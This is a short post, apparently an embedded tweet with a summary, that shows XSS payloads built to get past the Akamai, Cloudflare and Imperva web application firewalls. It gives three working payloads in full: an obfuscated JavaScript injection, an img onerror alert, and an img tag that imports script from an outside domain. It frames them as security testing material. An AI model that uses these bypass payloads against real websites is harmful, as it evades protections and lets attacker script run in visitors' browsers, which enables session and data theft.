This tweet showcases various XSS bypass payloads for Akamai, CloudFlare, and Imperva WAFs. The Akamai payload uses JS obfuscation to execute a script, the CloudFlare payload triggers an alert by manipulating an image tag, and the Imperva payload imports a source from a malicious domain. These payloads demonstrate the capability to bypass WAF protection against XSS attacks. Further analysis and testing can be found in the tweet link provided. #XSS #WAF #Bypass
Akamai JSi
';k='e'%0Atop['al'+k+'rt'](1)//CloudFlare HTMLi
<Img Src=OnXSS OnError=alert(1)>Imperva HTMLi
<Img Src=//X55.is OnLoad%0C=import(Src)>Don't learn to hack, #hack2learn.
?Developed forhttps://t.co/8p2UHZkD2u
State of the art in XSS testing.— Brute Logic (@BRuteLogic) March 11, 2024